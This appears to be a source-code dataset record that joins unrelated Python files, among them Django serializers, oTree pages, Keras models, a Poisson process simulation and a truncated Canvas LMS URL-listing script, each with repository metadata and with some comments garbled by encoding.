SITES_GUI_FIELDS = ['Id', 'Name', 'Link']
KEY_WORDS_GUI_FIELDS = ['Id', 'Word']
# ัะฟะธัะบะธ ะฒััั
ะฟะพะปัะฒ ะดะปั ะบะพะถะฝะพั ัะฐะฑะปะธัั
SITES_DATA_FIELDS = ['Id', 'Name', 'Link', 'Category_id']
KEY_WORDS_DATA_FIELDS = ['Id', 'Word', "Category_id"]
CATEGORIES_FIELDS = ['Id', 'Name']
| [
"davendiy@gmail.com"
] | davendiy@gmail.com |
f8fc74bc77f017e2505969268e870c2dd7ba18e2 | 6ca078e139db445e5f77335a16999a0fbafdb45a | /venv/bin/easy_install | e5382b13b191ac8cbb5a869d6d24fe22051c0e24 | [] | no_license | LeCezar/smalltalk-backend | 8deece76c18d9d40c4cb00ea265de35ab94adeb4 | b7a390f617e18275dbe21e0552851989e9c00970 | refs/heads/master | 2020-04-05T17:20:46.121271 | 2019-03-19T15:53:36 | 2019-03-19T15:53:36 | 157,055,707 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | #!/Users/LeCezar/Desktop/HermesHack/smalltalk-api/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"lecezar2014@gmail.com"
] | lecezar2014@gmail.com | |
be07e086075aa28837629e953e1b8669b42c2138 | ebc89cb9312cb7e99901936a4fb02aa680cc2ddd | /accounts/serializers.py | 136586c0c2e61e02a33fa278a656086d8b025062 | [] | no_license | yahyaest/PC_Shop_App | d9e4d7d7a45c60f60d73071e40c0c2a35e1b52ca | 670774b32c7306e7efe02f56cbaddde9f55576f7 | refs/heads/master | 2023-08-21T21:40:30.213681 | 2021-10-22T21:37:25 | 2021-10-22T21:37:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | from rest_framework import serializers
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
# User Serializer
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email')
# Register Serializer
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email', 'password')
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
user = User.objects.create_user(validated_data['username'], validated_data['email'], validated_data['password'])
return user
# Login Serializer
class LoginSerializer(serializers.Serializer):
username = serializers.CharField()
password = serializers.CharField()
def validate(self, data):
user = authenticate(**data)
if user and user.is_active:
return user
raise serializers.ValidationError("Incorrect Credentials")
| [
"machatyahya@gmail.com"
] | machatyahya@gmail.com |
3b03aa2b21533c47a10c5a3314b4853e10823cde | 233b03068cb9ba589869226765c207de9ed7f470 | /prints/pages.py | 309a35bafa2019b0769d57426dccf467be8147dd | [] | no_license | felmola/e_tourism_prints | 4abb8aa48df12325b8aa7c6a8da728b5d44d386a | 91cbfa3bbb22c5e70ea904a0fd663f412c8d223c | refs/heads/master | 2020-09-22T12:13:51.486735 | 2019-12-09T21:07:00 | 2019-12-09T21:07:00 | 225,189,088 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | from otree.api import Currency as c, currency_range
from ._builtin import Page, WaitPage
from .models import Constants
class p1_consent(Page):
form_model = "player"
form_fields = ["nombre", "id_number"]
class p2_intro(Page):
pass
class p3_seller_intro(Page):
pass
class p4_seller_decision(Page):
form_model = "player"
form_fields = ["id_number"]
class p5_seller_list(Page):
form_model = "player"
form_fields = ["id_number"]
class p5_1_seller_list(Page):
form_model = "player"
form_fields = ["id_number"]
class p6_buyer_intro(Page):
pass
class p7_buyer_decision(Page):
pass
class p8_buyer_sanction(Page):
pass
class p9_seller_results(Page):
pass
class p10_buyer_results(Page):
pass
class p11_final_results(Page):
pass
page_sequence = [p1_consent, p2_intro, p3_seller_intro, p4_seller_decision, p5_1_seller_list, p5_seller_list,
p6_buyer_intro, p7_buyer_decision, p8_buyer_sanction, p9_seller_results, p10_buyer_results,
p11_final_results]
| [
"43189041+felmola@users.noreply.github.com"
] | 43189041+felmola@users.noreply.github.com |
74d8499dc11c12ab39b85996eb1392b033f30265 | 163ac3e6566c0841367e77bc50620f0f3a5df6cc | /util/model_1.py | 2c9acdff8fa62400afb58f98ea5222ee776dbf68 | [] | no_license | squarefaceyao/SLSTM-TCNN | 1f0a680e7a1f0da7ffbd0e009e33aa34424c2566 | c0926cf73396278d1c9675bd6b35a89560c30033 | refs/heads/main | 2023-08-16T03:00:23.431598 | 2021-10-11T02:02:14 | 2021-10-11T02:02:14 | 372,364,827 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,810 | py | import numpy as np
from tensorflow import keras
from tensorflow.keras import layers
def model_3(units,input_size):
# ้ขๆตไฝฟ็จ็
# pcc = 0.850225693960388
model = keras.Sequential(
[
keras.Input(shape=(input_size,1)),
layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1"),
layers.MaxPooling1D(pool_size=2,name='Max1'),
layers.Conv1D(10, kernel_size=3, strides=2,activation="relu",padding='same',name='Conv1'),
layers.LSTM(units,return_sequences=True,name='lstm_1'),
layers.UpSampling1D(size=2,name='TC1'),
layers.Flatten(name='flatten'),
layers.Dense(300),
layers.Dropout(0.5),
layers.Dense(input_size),
]
)
return model
def salt(s):
new_array = np.zeros((1,10))
# print('่พๅ
ฅ็็ๆตๅบฆๆฏ{}mM'.format(s))
for i in range(1):
new_array[i] = np.array([0.25]*10)
new_array = new_array[np.newaxis,:]
xx2 = layers.Dense(10)(new_array)
return xx2
def model_4(units,input_size):
xx2 = salt(s=50)
input2 = keras.Input(shape=(input_size,1),name='input')
s = layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1")(input2)
s = layers.MaxPooling1D(pool_size=2,name='Max1')(s)
s = layers.Conv1D(10, kernel_size=3, strides=2,activation="relu",padding='same',name='Conv1')(s)
# s = layers.Concatenate()([s,xx2])
s = layers.Multiply()([s,xx2])
s = layers.LSTM(units,return_sequences=True,name='lstm_1')(s)
s = layers.UpSampling1D(size=2,name='TC1')(s)
s = layers.Flatten(name='flatten')(s)
s = layers.Dense(300)(s)
s = layers.Dropout(0.5)(s)
output2 = layers.Dense(input_size)(s)
model = keras.Model(inputs=[input2], outputs=[output2])
return model
# def model_3_588To1176(units,input_size):
# # pcc = 0.850225693960388
# model = keras.Sequential(
# [
# keras.Input(shape=(input_size,1)),
# layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1"),
# layers.MaxPooling1D(pool_size=2,name='Max1'),
# layers.Conv1D(10, kernel_size=3, strides=2,activation="relu",padding='same',name='Conv1'),
# layers.LSTM(units,return_sequences=True,name='lstm_1'),
# layers.UpSampling1D(size=2,name='TC1'),
# layers.Flatten(name='flatten'),
# layers.Dense(300),
# layers.Dropout(0.5),
# layers.Dense(input_size*2),
# ]
# )
# return model
def cnn_model(input_size):
# 9 ๅ็ฑปไฝฟ็จ
r = "relu"
ks = 5
st = 3
a = 0.005
model = keras.Sequential(
[
keras.Input(shape=(input_size,1)),
layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1"),
layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv1'),
layers.MaxPooling1D(pool_size=2,name='Max1'),
layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor2"),
layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv2'),
layers.MaxPooling1D(pool_size=2,name='Max2'),
layers.Flatten(name='flatten'),
layers.Dense(100,kernel_initializer='random_uniform',activation=r,activity_regularizer=keras.regularizers.l2(a),name = "Den1"),
layers.Dropout(0.2),
layers.Dense(9,activation="softmax",name = "Den2"),
]
)
model.compile(loss='categorical_crossentropy',optimizer='Adam', metrics=['accuracy'])
return model
def cnn_model_2(input_size):
# 2ๅ็ฑปไฝฟ็จ
r = "relu"
ks = 5
st = 3
a = 0.005
model = keras.Sequential(
[
keras.Input(shape=(input_size,1)),
layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1"),
layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv1'),
layers.MaxPooling1D(pool_size=2,name='Max1'),
# layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor2"),
# layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv2'),
# layers.MaxPooling1D(pool_size=2,name='Max2'),
# layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor3"),
# layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv3'),
# layers.MaxPooling1D(pool_size=2,name='Max3'),
# layers.Conv1D(10, kernel_size=3, strides=2,activation="relu",padding='same',name='Conv1'),
# layers.UpSampling1D(size=2,name='TC1'),
layers.Flatten(name='flatten'),
layers.Dense(100,kernel_initializer='random_uniform',activation=r,activity_regularizer=keras.regularizers.l2(a),name = "Den1"),
layers.Dense(50,kernel_initializer='random_uniform',activation=r,activity_regularizer=keras.regularizers.l2(a),name = "Den2"),
layers.Dense(10,kernel_initializer='random_uniform',activation=r,activity_regularizer=keras.regularizers.l2(a),name = "Den3"),
layers.Dropout(0.2),
layers.Dense(2,activation="softmax",name = "Den4"),
]
)
model.compile(loss='categorical_crossentropy',optimizer='Adam', metrics=['accuracy'])
return model
if __name__=='__main__':
units=12
model = model_4(units=units,input_size=588)
# model = cnn_model_2(input_size=1176)
# model = cnn_model(input_size=1176)
# model4 = model_4(12,588)
model.summary()
| [
"squarefaceyao@gmail.com"
] | squarefaceyao@gmail.com |
3011146a8f5e22280470e96e2fc8a5cdcb7a0f0e | 0d54a6cad2c167de84bc7b8ece8175ffafa90a09 | /vertica_python/vertica/messages/backend_messages/load_file.py | b50497a7a374c0436ec0de35723a2fc7c1b782af | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hirnimeshrampuresoftware/vertica-python | 34a9e54dba3f6d8e2b72e46b57d93f4ba9f263af | 1b308d151794b2e962e122ead15a21aec4abc3a0 | refs/heads/master | 2023-01-01T01:25:17.565530 | 2020-10-19T10:22:31 | 2020-10-19T10:22:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,101 | py | # Copyright (c) 2020 Micro Focus or one of its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from struct import unpack
from ..message import BackendMessage
class LoadFile(BackendMessage):
message_id = b'H'
def __init__(self, data):
BackendMessage.__init__(self)
unpacked = unpack('!{0}sx'.format(data.find(b'\x00')), data)
self.filename = unpacked[0].decode('utf-8')
def __str__(self):
return "LoadFile: name = {}".format(self.filename)
BackendMessage.register(LoadFile)
| [
"noreply@github.com"
] | hirnimeshrampuresoftware.noreply@github.com |
cd1d419f5a3f85addd1204ac4ad6e1913f96620f | ed04021422f82c4a81dea3cabcd68b69392962b5 | /KeyPressModule.py | d876f56f2a70e878699dd9e0d0822b4bcba6a3d9 | [
"Apache-2.0"
] | permissive | kaelfdl/ai-deep-learning-self-driving-raspberry-pi-tesseract | 602108c356428af5c796dcb5df726e0873f7dc86 | 8b6e7e6d0ba203a5b02855b702c7e2483bd6ecb5 | refs/heads/master | 2023-07-04T09:39:18.158604 | 2021-08-03T10:52:33 | 2021-08-03T10:52:33 | 369,888,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | import pygame
def init():
pygame.init()
win = pygame.display.set_mode((100,100))
def get_key(key_name):
flag = False
for event in pygame.event.get():
pass
key_input = pygame.key.get_pressed()
key = getattr(pygame, 'K_{}'.format(key_input))
if key_input[key]:
flag = True
pygame.display.update()
return flag
def main():
if get_key('w'):
print('Key w was pressed')
if __name__ == '__main__':
init()
while(1):
main() | [
"gabryel.flordelis@gmail.com"
] | gabryel.flordelis@gmail.com |
e7df45838c5ad83d0271ecaed881954cab291536 | ad6b4875d7aef06eaa3848d73d65b8ada67cd793 | /210220/while1.py | 79f74fe98e5cddbc94ed699b0f0083e760cfdc39 | [] | no_license | 2020-AL-STUDY/Algorithms | 50510b81705fd0d6eb511de56e496abbc0930099 | 3d75dd149d19412fdf7ea030b0a0babdf4c95d3a | refs/heads/main | 2023-06-07T12:05:10.730007 | 2021-06-28T12:47:16 | 2021-06-28T12:47:16 | 302,847,419 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | a, b = map(int, input().split())
c = []
while a != 0 or b != 0:
c.append(a+b)
a, b = map(int, input().split())
for i in c:
print(i)
| [
"gyfls7748@gmail.com"
] | gyfls7748@gmail.com |
34109b133c9e51f5fe159c8a970393a67ac6d7d8 | 169e75df163bb311198562d286d37aad14677101 | /tensorflow/tensorflow/python/ops/gradients.py | 9fa8e27d5cb51e0c2dd0b7926756a579d38841d2 | [
"Apache-2.0"
] | permissive | zylo117/tensorflow-gpu-macosx | e553d17b769c67dfda0440df8ac1314405e4a10a | 181bc2b37aa8a3eeb11a942d8f330b04abc804b3 | refs/heads/master | 2022-10-19T21:35:18.148271 | 2020-10-15T02:33:20 | 2020-10-15T02:33:20 | 134,240,831 | 116 | 26 | Apache-2.0 | 2022-10-04T23:36:22 | 2018-05-21T08:29:12 | C++ | UTF-8 | Python | false | false | 1,240 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implements the graph generation for computation of gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.python.eager.backprop import GradientTape
from tensorflow.python.ops.custom_gradient import custom_gradient
from tensorflow.python.ops.gradients_impl import AggregationMethod
from tensorflow.python.ops.gradients_impl import gradients
from tensorflow.python.ops.gradients_impl import hessians
# pylint: enable=unused-import
| [
"thomas.warfel@pnnl.gov"
] | thomas.warfel@pnnl.gov |
f65f159a24c852f737a8a72d67d4b69433fc9497 | d9eb2899fb0e1bee725d68147846489b6446e2f0 | /contentful_management/space_periodic_usage.py | de4eff736048b2fd7297ac75f5900b1ab4259212 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | contentful/contentful-management.py | 1f87ed9819becfa09bea795fba241384a9482045 | 5202e6ded776783c0611338b6613fec731182c3e | refs/heads/master | 2023-09-03T23:22:42.450198 | 2023-01-12T15:12:52 | 2023-01-12T15:12:52 | 84,083,785 | 36 | 18 | MIT | 2023-09-13T15:10:41 | 2017-03-06T14:38:28 | Python | UTF-8 | Python | false | false | 1,294 | py | from .resource import Resource
"""
contentful_management.space_periodic_usage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module implements the SpacePeriodicUsage class.
API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/usage
:copyright: (c) 2020 by Contentful GmbH.
:license: MIT, see LICENSE for more details.
"""
class SpacePeriodicUsage(Resource):
"""
API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/usage
"""
def __init__(self, item, **kwargs):
super(SpacePeriodicUsage, self).__init__(item, **kwargs)
self.unit_of_measure = item.get('unitOfMeasure', None)
self.metric = item.get('metric', None)
self.usage = item.get('usage', None)
self.usage_per_day = item.get('usagePerDay', None)
self.date_range = item.get('dateRange', None)
def _linkables(self):
return super(SpacePeriodicUsage, self)._linkables() + ['organization']
@classmethod
def base_url(klass, organization_id):
return "organizations/{0}/space_periodic_usages".format(organization_id)
def __repr__(self):
return "<SpacePeriodicUsage id='{0}'>".format(
self.sys.get('id', '')
)
| [
"noreply@github.com"
] | contentful.noreply@github.com |
68d509c7c66a8393f202ba51444e4af380bc3c9b | 9ca9cad46f2358717394f39e2cfac2af4a2f5aca | /Week16/MainHW/MainHW Week16_KSY.py | 86af737749bde01e82c6dcf8a85382d1d4c33cd5 | [] | no_license | Artinto/Python_and_AI_Study | ddfd165d1598914e99a125c3019a740a7791f6f6 | 953ff3780287825afe9ed5f9b45017359707d07a | refs/heads/main | 2023-05-05T15:42:25.963855 | 2021-05-24T12:24:31 | 2021-05-24T12:24:31 | 325,218,591 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,897 | py | '''
This script shows how to predict stock prices using a basic RNN
'''
import torch
import torch.nn as nn
from torch.autograd import Variable
import numpy as np
import os
import matplotlib
torch.manual_seed(777) # reproducibility
import matplotlib.pyplot as plt
def MinMaxScaler(data):
''' Min Max Normalization
Parameters
----------
data : numpy.ndarray
input data to be normalized
shape: [Batch size, dimension]
Returns
----------
data : numpy.ndarry
normalized data
shape: [Batch size, dimension]
References
----------
.. [1] http://sebastianraschka.com/Articles/2014_about_feature_scaling.html
'''
numerator = data - np.min(data, 0)
denominator = np.max(data, 0) - np.min(data, 0)
# noise term prevents the zero division
return numerator / (denominator + 1e-7)
# train Parameters
learning_rate = 0.01
num_epochs = 500
input_size = 5
hidden_size = 5
num_classes = 1
timesteps = seq_length = 14
num_layers = 1 # number of layers in RNN
# Open, High, Low, Volume, Close
xy = np.loadtxt('stock.csv', delimiter=',')
xy = xy[::-1] # reverse order (chronically ordered)
xy = MinMaxScaler(xy)
x = xy
y = xy[:, [-1]] # Close as label
# build a dataset
dataX = []
dataY = []
for i in range(0, len(y) - seq_length):
_x = x[i:i + seq_length]
_y = y[i + seq_length] # Next close price
dataX.append(_x)
dataY.append(_y)
# train/test split
train_size = int(len(dataY) * 0.7)
test_size = len(dataY) - train_size
trainX = torch.Tensor(np.array(dataX[0:train_size]))
trainX = Variable(trainX)
testX = torch.Tensor(np.array(dataX[train_size:len(dataX)]))
testX = Variable(testX)
trainY = torch.Tensor(np.array(dataY[0:train_size]))
trainY = Variable(trainY)
testY = torch.Tensor(np.array(dataY[train_size:len(dataY)]))
testY = Variable(testY)
class LSTM(nn.Module):
def __init__(self, num_classes, input_size, hidden_size, num_layers):
super(LSTM, self).__init__()
self.num_classes = num_classes
self.num_layers = num_layers
self.input_size = input_size
self.hidden_size = hidden_size
self.seq_length = seq_length
# Set parameters for RNN block
# Note: batch_first=False by default.
# When true, inputs are (batch_size, sequence_length, input_dimension)
# instead of (sequence_length, batch_size, input_dimension)
self.lstm = nn.LSTM(input_size=input_size, hidden_size=hidden_size,
num_layers=num_layers, batch_first=True)
# Fully connected layer
self.fc = nn.Linear(hidden_size, num_classes)
def forward(self, x):
# Initialize hidden and cell states
h_0 = Variable(torch.zeros(
self.num_layers, x.size(0), self.hidden_size))
c_0 = Variable(torch.zeros(
self.num_layers, x.size(0), self.hidden_size))
# Propagate input through LSTM
_, (h_out, _) = self.lstm(x, (h_0, c_0))
h_out = h_out.view(-1, self.hidden_size)
out = self.fc(h_out)
return out
# Instantiate RNN model
lstm = LSTM(num_classes, input_size, hidden_size, num_layers)
# Set loss and optimizer function
criterion = torch.nn.MSELoss() # mean-squared error for regression
optimizer = torch.optim.Adam(lstm.parameters(), lr=learning_rate)
# Train the model
for epoch in range(num_epochs):
outputs = lstm(trainX)
optimizer.zero_grad()
# obtain the loss function
loss = criterion(outputs, trainY)
loss.backward()
optimizer.step()
print("Epoch: %d, loss: %1.5f" % (epoch, loss.item()))
print("Learning finished!")
# Test the model
lstm.eval()
test_predict = lstm(testX)
# Plot predictions
test_predict = test_predict.data.numpy()
testY = testY.data.numpy()
plt.plot(testY)
plt.plot(test_predict)
plt.xlabel("Time Period")
plt.ylabel("Stock Price")
plt.show()
| [
"noreply@github.com"
] | Artinto.noreply@github.com |
2db1cfdefc172264003cd0e623abc22216f67b0a | 8963880dc47529d966dbb8abd7df5fdf2f673d9f | /venv/bin/chardetect | fbde743e6bb13977107f9778c2dd20de4feeb57d | [] | no_license | jvarghese3/TechRadarPublish | b8dfd2081424f8563a38f9040c3a1d27fca5a42c | 1b4f0e12363cb318250c02547bfafe41c1785bae | refs/heads/master | 2020-03-25T00:44:49.973610 | 2018-08-02T22:22:52 | 2018-08-02T22:22:52 | 143,203,567 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 275 | #!/Users/jvarghese3/PycharmProjects/TechRadarPublish/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jvarghese3@MTVL161c44809.local"
] | jvarghese3@MTVL161c44809.local | |
0861a3ba0e77e14cd38e259cec9bfe9413d33873 | e7d5555eb0b80ad59e7c76dd31e5fa9a23ec4a4c | /muddery/worlddata/dao/dialogue_sentences_mapper.py | 6e08b22dd51bc6ba16bc055d6d3aed08c566c4e2 | [
"BSD-3-Clause"
] | permissive | noahzaozao/muddery | 4d1ef24b4a7f0ef178a1c28c367a441cbb57ee5c | 294da6fb73cb04c62e5ba6eefe49b595ca76832a | refs/heads/master | 2023-01-25T02:23:50.123889 | 2018-06-10T17:12:22 | 2018-06-10T17:12:22 | 137,031,119 | 0 | 0 | NOASSERTION | 2019-10-28T15:04:26 | 2018-06-12T07:05:42 | Python | UTF-8 | Python | false | false | 691 | py | """
Query and deal common tables.
"""
from __future__ import print_function
from evennia.utils import logger
from django.apps import apps
from django.conf import settings
class DialogueSentencesMapper(object):
"""
NPC's dialogue sentences.
"""
def __init__(self):
self.model_name = "dialogue_sentences"
self.model = apps.get_model(settings.WORLD_DATA_APP, self.model_name)
self.objects = self.model.objects
def filter(self, key):
"""
Get dialogue sentences.
Args:
key: (string) dialogue's key.
"""
return self.objects.filter(dialogue=key)
DIALOGUE_SENTENCES = DialogueSentencesMapper()
| [
"luyijun999@gmail.com"
] | luyijun999@gmail.com |
ea86b165173183397c78e5aa1e6322ec98a122de | 740cd3a198c8ebb815da04c0e7a549696ab6a84c | /virtual/bin/wheel | 4ef50c7f2679686ea22a122921d06bdaa0c52a4f | [] | no_license | kahenya-anita/Simple-Ecommerce | 3a3734e8b9f8c5ce489404042c456449adbca724 | ff9d7d06869c52d595304ab238f797a1c65947d0 | refs/heads/master | 2023-03-03T13:40:43.930809 | 2021-02-09T15:24:56 | 2021-02-09T15:24:56 | 337,444,815 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | #!/home/toshiba/Documents/Ecommerce_Django-master/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"anitakahenya1@gmail.com"
] | anitakahenya1@gmail.com | |
c75990daa686c163399bb778d1290107e5424fe4 | 868f8980eced9e3eeeaf22175e15ba4e44e6e786 | /poisson.py | 555e2f6dfd6fbdc5f6ae77c191e509a05ba3765c | [] | no_license | jin-bowen/stochastic_process | e0990dfda27d33fa0501d4073149250d0c8a4b25 | d754487fcf8ab40ccd6396e164f78679290123cc | refs/heads/master | 2020-08-26T18:06:41.369651 | 2020-05-08T00:16:42 | 2020-05-08T00:16:42 | 217,098,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
import random
import math
def poisson(r, jump_size, total_t, sample_point=1000):
points = np.zeros((sample_point, 2))
points[:,0] = np.linspace(0, total_t, num=sample_point)
points[:,1] = 0
dt = float(total_t - 0)/float(sample_point - 1)
cum_t = 0
while(cum_t <= total_t):
lambda_i = r * (3 + np.cos(cum_t) + 2 * np.cos(2*cum_t))
p = random.random()
interval = -math.log(1.0 - p)/lambda_i
cum_t += interval
nt = int(np.floor(min(cum_t,total_t)/dt))
points[nt:,1] += jump_size
return points
def main():
poisson01 = poisson(0.1, 1, total_t=20, sample_point=100)
poisson1 = poisson(1.0, 1, total_t=20, sample_point=100)
poisson10 = poisson(10.0,1, total_t=20, sample_point=100)
fig, ax = plt.subplots(nrows=3, sharex=True)
plt.suptitle('counting process')
ax[0].set_title('sample points: 1000, r = 0.1')
ax[0].set_ylabel('N(t)')
ax[0].plot(poisson01[:,0], poisson01[:,1], 'g-')
ax[1].set_title('sample points: 1000, r = 1')
ax[1].set_ylabel('N(t)')
ax[1].plot(poisson1[:,0], poisson1[:,1], 'y-')
ax[2].set_title('sample points: 1000, r = 10')
ax[2].set_ylabel('N(t)')
ax[2].plot(poisson10[:,0], poisson10[:,1], 'r-')
plt.legend()
plt.xlabel('time')
plt.show()
#ax.savefig('poisson.png')
if __name__ == "__main__":
main()
| [
"bxj139@case.edu"
] | bxj139@case.edu |
8c8bb9481e76250c7415b792fe42e94758bcab2f | 2aa7d25292f07aa8ede1365f648709a8457c6279 | /Ex_28.py | f558d475bb941546569c0a7635ca72326ef305be | [] | no_license | patrickmgebhard/Learn_python_the_hard_way | b28cf21ee31097844b5d65a147f9ddb5fc7ec847 | 2b98fecb5332f8bb7baf2069ec11e3f0862f1697 | refs/heads/main | 2022-12-24T02:37:26.690637 | 2022-12-12T20:54:43 | 2022-12-12T20:54:43 | 77,302,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | True and True
# True
False and True
# False
1 == 1 and 2 == 1
# False
"test" == "test"
#True
1 == 1 or 2 != 1
# True
True and 1 == 1
# True
False and 0 != 0
# False
True or 1 == 1
# True
"test" == "testing"
# False
1 != 0 and 2 == 1
# False
"test" != "testing"
# True
"test" == 1
# False
not (True and False)
# True
not (1 == 1 and 0 != 1)
# False
not (10 == 1 or 1000 == 1000)
# False
not (1 != 10 or 3 == 4)
# False
not ("testing" == "testing" and "Zed" == "Cool Guy")
# True
1 == 1 and (not ("testing" == 1 or 1 == 0))
# True
"chunky" == "bacon" and (not (3 == 4 or 3 == 3))
# False
3 == 3 and (not ("testing" == "testing" or "Python" == "Fun"))
# False
| [
"patrickmgebhard@gmail.com"
] | patrickmgebhard@gmail.com |
6b34dfae513fa55c66c92dd64ea87fa9d1207242 | 45a924e5cd1dfc75a2088d3d4463995803a06a09 | /frappe/email/doctype/email_unsubscribe/test_email_unsubscribe.py | 602840fe3b30b30238661516ade48243176ea9b0 | [
"MIT"
] | permissive | joe-santy/frappe | 7cad66295f07f60176fbbc24766af5e38ac1e9d2 | a6d9170e5fd9fdff462eee7967409ff7e23b6d2f | refs/heads/develop | 2023-07-15T15:59:03.226729 | 2021-08-09T16:20:11 | 2021-08-09T16:20:11 | 394,489,040 | 0 | 0 | MIT | 2021-08-13T13:12:31 | 2021-08-10T01:22:17 | null | UTF-8 | Python | false | false | 258 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
import frappe
import unittest
# test_records = frappe.get_test_records('Email Unsubscribe')
class TestEmailUnsubscribe(unittest.TestCase):
pass
| [
"rmehta@gmail.com"
] | rmehta@gmail.com |
5271e0aa4d4bd54e4dc811366c02c1b6de9d5155 | e7069d85fd4a6fac4958f19b4d14503ffa42b4bb | /connecting_silos_kththesis_TCOMK_CINTE/mysite/polls/library/Canvas-master/compute_list_of_KTH_play_URLs_on_pages_in_course3.py | 3320841678f5de02e64319ba7c296b48e4a75a03 | [] | no_license | ShivaBP/Bechelor-degree-project | cd062ff10e207e380a2c59bc0a50f073c2e866bd | 9f055d69ec9deabb6bd8ab3768c9d56787eed94d | refs/heads/master | 2022-07-21T01:18:41.893027 | 2018-11-16T14:38:13 | 2018-11-16T14:38:13 | 137,949,087 | 0 | 0 | null | 2022-07-06T19:49:14 | 2018-06-19T21:47:51 | HTML | UTF-8 | Python | false | false | 16,355 | py | #!/usr/bin/python3
#
# ./compute_list_of_KTH_play_URLs_on_pages_in_course3.py course_id
#
# walks all of the course pages, the syllabus, and assignments
#
# it outputs a CSV file with the name URLs_for_course_xx.csv
# where xx is the course_id
#
# G. Q. Maguire Jr.
#
# 2017.04.21
# based on earlier program: compute_stats_for_pages_in_course.py
#
import csv, requests, time
from pprint import pprint
import optparse
import sys
from lxml import html
import json
#############################
###### EDIT THIS STUFF ######
#############################
# styled based upon https://martin-thoma.com/configuration-files-in-python/
with open('config.json') as json_data_file:
configuration = json.load(json_data_file)
canvas = configuration['canvas']
access_token= canvas["access_token"]
# access_token=configuration["canvas"]["access_token"]
#baseUrl = 'https://kth.instructure.com/api/v1/courses/' # changed to KTH domain
baseUrl = 'https://%s/api/v1/courses/' % canvas.get('host', 'kth.instructure.com')
header = {'Authorization' : 'Bearer ' + access_token}
#modules_csv = 'modules.csv' # name of file storing module names
log_file = 'log.txt' # a log file. it will log things
def write_to_log(message):
with open(log_file, 'a') as log:
log.write(message + "\n")
pprint(message)
def unique_URLs(txt):
set_of_unique_URLs=set()
text_words=txt.split()
for t in text_words:
if (t.find("http://") >= 0 or
t.find("HTTP://") >= 0 or
t.find("https://") >= 0 or
t.find("HTTPs://") >= 0):
set_of_unique_URLs.add(t)
return set_of_unique_URLs
def unique_KTH_Play_URLs(set_of_urls):
set_of_unique_URLs=set()
for t in set_of_urls:
